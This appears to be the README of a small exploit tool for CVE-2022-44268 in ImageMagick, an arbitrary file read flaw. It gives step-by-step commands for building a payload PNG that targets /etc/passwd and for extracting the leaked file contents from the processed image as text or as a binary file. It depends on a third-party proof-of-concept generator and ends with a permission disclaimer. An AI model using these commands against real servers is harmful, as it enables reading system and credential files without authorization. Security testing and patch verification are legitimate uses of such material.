This script is a simple way to read large and small files using the CVE-2022-44268 vulnerability in ImageMagick. You can use this script to read the content of a file as UTF-8 text or read and create a binary file like a .zip .db .jpg etc.
- Python 3.x
- ImageMagick installed and configured (required for the
identifycommand) - You also need generate.py file from the repository https://github.com/Sybil-Scan/imagemagick-lfi-poc
First, you need to generate the payload using the generate.py.
python3 generate.py -f <file_to_read> -o <output_file>
python3 generate.py -f "/etc/passwd" -o payload.png
Run the script readermagick from the command line with the following command:
python readermagick.py <image_file_name> [-v]
- Replace
<image_file_name>with the path to the image file you want to process. - The optional
-vflag can be used to print the content as UTF-8 text instead of creating a binary file.
To extract the infomation from the example.png file and create a binary file with the content:
python readermagick.py example.png
To process the same image file and print the content as UTF-8 text:
python readermagick.py example.png -v
it is recommended to read the original PoC from Sybil Security to understand how to use the generate.py script and the identify command.
Only use this script on systems you own or have permission to test. Unauthorized access to files is illegal and unethical.
- Sybil Security for the original PoC and the CVE-2022-44268 vulnerability discovery.
- ChatGPT